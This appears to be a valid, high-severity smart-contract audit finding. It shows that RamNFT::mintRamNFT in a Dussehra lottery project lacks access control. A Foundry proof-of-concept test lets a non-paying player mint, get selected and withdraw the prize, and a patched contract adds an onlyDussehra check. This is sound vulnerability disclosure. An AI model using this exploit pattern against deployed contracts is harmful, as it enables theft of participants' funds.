Beginner Friendly, Foundry, NFT
100 EXP
Submission Details
Severity: high
Valid

A free participant could steal the prize because RamNFT::mintRamNFT has no restrictions, allowing minting outside the Dussehra rules

Summary

RamNFT::mintRamNFT has no access restrictions, which opens a window for a free participant to steal the prize if their token is selected by ChoosingRam::selectRamIfNotSelected. RamNFT::mintRamNFT should only be callable by Dussehra::enterPeopleWhoLikeRam.

Vulnerability Details

The "free" RamNFT can be selected as Ram when ChoosingRam::selectRamIfNotSelected is called, which lets the owner of that RamNFT call Dussehra::killRavana and then withdraw the prize through Dussehra::withdraw.

Impact

A player that hasn't paid the entrance fee can steal the prize intended for paid participants.

Tools Used

Manual review

Proof of Code

Include this test in test/Dussehra.t.sol:

    function test_freeRamNFTStealsPrizeAfterkillRavana() public participants {
        // player3 never paid the entrance fee, yet mints a RamNFT directly
        vm.startPrank(player3);
        ramNFT.mintRamNFT(player3);
        vm.stopPrank();

        assertEq(player3.balance, 0); // starting balance
        // tokens 0 and 1 were minted through the participants modifier; token 2 is the free one
        assertEq(ramNFT.ownerOf(2), player3);
        assertEq(ramNFT.getCharacteristics(2).ram, player3);

        // past the selection deadline, the organiser triggers the Ram selection
        vm.warp(1728691200 + 1);
        vm.startPrank(organiser);
        choosingRam.selectRamIfNotSelected();
        vm.stopPrank();
        assertEq(choosingRam.selectedRam(), player3);

        // the free participant kills Ravana and withdraws the prize pool
        vm.startPrank(player3);
        dussehra.killRavana();
        dussehra.withdraw();
        vm.stopPrank();

        // ending balance (the participants modifier makes player1 and player2 enter paying the entrance fee)
        assertEq(player3.balance, 1 ether);
    }

Recommendations

Add a check that the caller of RamNFT::mintRamNFT is the Dussehra contract, so that minting is only reachable through Dussehra::enterPeopleWhoLikeRam.
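One way to implement the recommended check, as an added sketch that is not the audited project's code: the organiser registers the Dussehra address once and an onlyDussehra modifier gates the mint. The setDussehra function, the custom errors and the reduced CharacteristicsOfRam struct are assumptions about the contract layout; only mintRamNFT and the organiser/Dussehra roles come from the report.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {ERC721} from "@openzeppelin/contracts/token/ERC721/ERC721.sol";

// Illustrative hardening of RamNFT::mintRamNFT (added example, not the audited code).
// Assumed deployment order: organiser deploys RamNFT, deploys Dussehra, then calls setDussehra once.
contract RamNFT is ERC721 {
    error RamNFT__NotOrganiser();
    error RamNFT__NotDussehra();
    error RamNFT__DussehraAlreadySet();

    struct CharacteristicsOfRam {
        address ram;
        // remaining trait flags omitted in this sketch
    }

    address public immutable organiser;
    address public dussehra; // the only address allowed to mint
    uint256 public tokenCounter;
    mapping(uint256 tokenId => CharacteristicsOfRam) public characteristics;

    modifier onlyOrganiser() {
        if (msg.sender != organiser) revert RamNFT__NotOrganiser();
        _;
    }

    // Minting is reachable only through Dussehra::enterPeopleWhoLikeRam,
    // which is where the entrance fee is collected.
    modifier onlyDussehra() {
        if (msg.sender != dussehra) revert RamNFT__NotDussehra();
        _;
    }

    constructor() ERC721("RamNFT", "RAM") {
        organiser = msg.sender;
    }

    // One-shot wiring so minting cannot later be repointed to an arbitrary address.
    function setDussehra(address _dussehra) external onlyOrganiser {
        if (dussehra != address(0)) revert RamNFT__DussehraAlreadySet();
        dussehra = _dussehra;
    }

    function mintRamNFT(address to) external onlyDussehra {
        uint256 newTokenId = tokenCounter++;
        _safeMint(to, newTokenId);
        characteristics[newTokenId] = CharacteristicsOfRam({ram: to});
    }
}
```

With this change the proof-of-code test above reverts with RamNFT__NotDussehra at ramNFT.mintRamNFT(player3), since player3 is not the registered Dussehra contract.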

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

mintRamNFT is public
